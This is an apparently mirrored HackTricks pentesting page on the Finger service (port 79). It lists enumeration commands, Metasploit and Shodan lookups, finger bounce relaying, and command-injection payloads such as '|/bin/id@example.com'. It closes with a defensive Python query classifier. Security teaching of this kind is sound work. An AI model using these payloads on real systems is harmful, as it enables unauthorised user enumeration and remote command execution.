mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-21 20:23:18 +00:00
79 - Pentesting Finger
Basic Info
The Finger program/service is utilized for retrieving details about computer users. Typically, the information provided includes the user's login name, full name, and, in some cases, additional details. These extra details could encompass the office location and phone number (if available), the time the user logged in, the period of inactivity (idle time), the last instance mail was read by the user, and the contents of the user's plan and project files.
Default port: 79
PORT STATE SERVICE
79/tcp open finger
Enumeration
Banner Grabbing/Basic connection
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
User enumeration
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
finger-user-enum from pentestmonkey, some examples:
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
Nmap runs a finger script as part of its default scripts
Metasploit uses more tricks than Nmap
use auxiliary/scanner/finger/finger_users
Shodan
port:79 USER
Command execution
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
Finger Bounce
Use a system as a finger relay
finger user@host@victim
finger @internal@external
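A server-side view of the command execution and finger bounce requests above, as an added example (not code from HackTricks or from any finger daemon): it classifies the query line that reaches 79/tcp under the RFC 1288 grammar and rejects relay requests and names containing shell metacharacters. The username pattern, the size cap, and the assumption that the client splits its argument at the last `@` are choices made for this example.

```python
import re
from typing import NamedTuple, Tuple

# Conservative account-name pattern (an assumption; adjust to local policy).
USERNAME = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]{0,31}\Z")
MAX_QUERY = 512  # arbitrary cap chosen for this example


class Verdict(NamedTuple):
    action: str  # "allow" or "reject"
    kind: str    # user | list | forward | unsafe | malformed
    detail: str


def split_client_arg(arg: str) -> Tuple[str, str]:
    """Split a `finger` argument into (query sent on the wire, server contacted).

    Assumes the client splits at the last '@', so the contacted server
    receives everything to the left of it.
    """
    query, _, server = arg.rpartition("@")
    return query, server


def classify(raw: bytes, allow_list: bool = False) -> Verdict:
    """Classify one RFC 1288 query line as received by a server on 79/tcp."""
    if len(raw) > MAX_QUERY or not raw.endswith(b"\n"):
        return Verdict("reject", "malformed", "missing line terminator or too long")
    try:
        line = raw.rstrip(b"\r\n").decode("ascii")
    except UnicodeDecodeError:
        return Verdict("reject", "malformed", "non-ASCII bytes")
    tokens = line.split()
    if tokens and tokens[0].upper() == "/W":  # verbose switch, not part of the name
        tokens = tokens[1:]
    query = " ".join(tokens)
    if "@" in query:  # {Q2}: asks this host to relay the query onwards
        return Verdict("reject", "forward", "relay to " + query.split("@", 1)[1])
    if not query:     # {Q1} without a name: list of logged-in users
        return Verdict("allow" if allow_list else "reject", "list", "user list")
    if not USERNAME.match(query):
        return Verdict("reject", "unsafe", "characters outside the username set")
    return Verdict("allow", "user", query)
```

Running `split_client_arg` on an argument from a shell history or process log shows which host was contacted and what query it received, which is the string to look for in the daemon's own logs.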